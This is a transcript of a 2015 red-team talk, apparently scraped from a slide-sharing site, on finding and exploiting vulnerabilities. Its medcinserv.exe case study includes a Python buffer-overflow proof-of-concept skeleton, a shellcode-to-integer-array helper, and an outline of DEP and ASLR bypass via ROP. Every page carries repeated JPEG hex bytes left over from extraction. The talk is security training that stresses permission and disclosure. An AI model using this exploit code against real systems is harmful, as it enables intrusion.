Software vulnerability discovery and exploitation during red team assessments
Transcript of Software vulnerability discovery and exploitation during red team assessments
![Page 1: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/1.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Software Vulnerability Discovery & Exploitation During Red Team
Assessments
Ryan Wincey [email protected]
9/30/2015
![Page 2: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/2.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Background
• Long term red team assessments
• Persistence with remote access tools
• Looking for alternative means of network propagation or privilege escalation
![Page 3: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/3.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windowsnetstat -ano | findstr LISTEN
![Page 4: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/4.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windowstasklist /v | findstr <pid>
![Page 5: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/5.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Linuxnetstat -anop | grep LISTENps -ef | grep <pid>
![Page 6: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/6.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Reverse Engineering Software– IDA Pro/Hexrays– Hopper– Other
• Target Binary
![Page 7: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/7.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Helpful bug hunting tips
– Identify areas where data is introduced from outside of the application
• Command Line Parameters• Socket Reads• File Reads• Environment Variables• i.e. read, gets, fread, fgets, recv, recv_from
![Page 8: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/8.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Helpful bug hunting tips
– Trace those inputs to parsing functions; look for interesting functions and memory operations• strcpy, strcat• sprintf, printf• memcpy• system• any custom string or memory copies
![Page 9: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/9.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Dynamic Analysis
Checklist• In order to perform dynamic analysis, we will need to
ensure that the application will run in our test environment.
• Tips for getting the application to run.– Zip up support files in the same directory. ( 7za, zip )– Listdlls.exe, ldd - loaded libraries– Handle.exe, /proc/<pid> - open files– Procmon.exe – identify registry keys – Read log files – track down missing files or registry settings
![Page 10: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/10.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Analyzing Process
Memory• Comparing the running process environment
to your test environment.
• Windowsprocdump.exe /accepteula -ma <pid> <dump file>
• Linuxgdb attach <pid>
![Page 11: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/11.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Crash Dumps
• In the event that you crash the application and want to collect crash dumps.
• WindowsHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
DumpFolderDumpCountDumpTypeCustomDumpFlags
• Linuxulimit –c unlimited
![Page 12: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/12.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Identify target and binary location
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
![Page 13: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/13.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Identify target and binary location
![Page 14: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/14.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
![Page 15: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/15.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
![Page 16: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/16.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
![Page 17: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/17.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
![Page 18: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/18.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
![Page 19: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/19.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
![Page 20: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/20.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Query service details in registry
![Page 21: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/21.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Setup as nearly identical environment
• Operating system
• File system
• Service registration
• Debugging tools
• Scripting support
![Page 22: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/22.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Set breakpoint on our vulnerable function
![Page 23: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/23.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Set breakpoint on our vulnerable function
![Page 24: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/24.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• POC Skeleton
– Define Protocol
[ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
– Choose Implementation
Python, Ruby, Powershell, C
– Code up boiler plate stuff / Use template
Socket connect, send, recv,
Formatting
![Page 25: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/25.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• POC Skeleton
if len (sys.argv) == 3: (progname, host, port) = sys.argvelse: print 'Usage: {0} host port'.format (sys.argv[0]) exit (1)
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)csock.connect ( (host, int(port)) )csock.settimeout(1)
print "[+] connected to server."
#Try thingsi = 238
data = “1,” * 1000
print "[+] sending data."send( i, len(data) + 6, data)
csock.close()print "[+] goodbye"
def send(type, pack_len, data=None):
if pack_len < 6 or pack_len > 0x3d090: print "Length must be between 6 and 0x3d090 bytes."
#Set the type buf = struct.pack('>h', type)
#Send length, must be less than 0x3d090, can be negative buf += struct.pack('>i', pack_len)
#Send data if pack_len > 0: buf += data try: #Send data csock.send(buf) except: pass
Integer Array
![Page 26: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/26.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• We own EIP
![Page 27: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/27.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.• Medcinserv.exe, doesn’t have any built in protections
![Page 28: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/28.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Bypass DEP by changing the execution permissions of the stack dynamically.• Change permissions using ROP chain composed of gadgets from the medcinserv binary.• Bypass ASLR because ROP gadgets in medcinserv binary are static.• NULL bytes are allowed since it’s an integer array buffer overflow.
![Page 29: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/29.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• ROP gadgets generated for VirtualAlloc• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
![Page 30: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/30.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Exploit Design Structure
![Page 31: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/31.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Shellcode to String Array Function
def add_shellcode( sc ): global data
#Determine the iterator shellcode_len = len(sc) iterator = shellcode_len / 4 if shellcode_len % 4 > 0: iterator +=1
counter = 0 for i in range( int( iterator ) ): entry = sc[ (i*4) : (i*4)+4 ]
#Make sure length is four bytes len_entry = len(entry) if len( entry ) < 4: entry += "\x90" * ( 4 - len_entry) data += str(struct.unpack("<I", entry )[0]) + ","
counter += 1
return counter
![Page 32: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/32.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
DEMO
![Page 33: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/33.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Test Exploit
• Test in as nearly identical environment as possible
• Non-critical systems, preferably when users are away
• Make sure to get permission
• Get more shellz
![Page 34: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/34.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Reporting
• US CERT
• MITRE
• NIST
![Page 35: Software vulnerability discovery and exploitation during red team assessments](https://reader035.fdocuments.net/reader035/viewer/2022062503/58730c791a28ab99088b6ee3/html5/thumbnails/35.jpg)
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
QUESTIONS?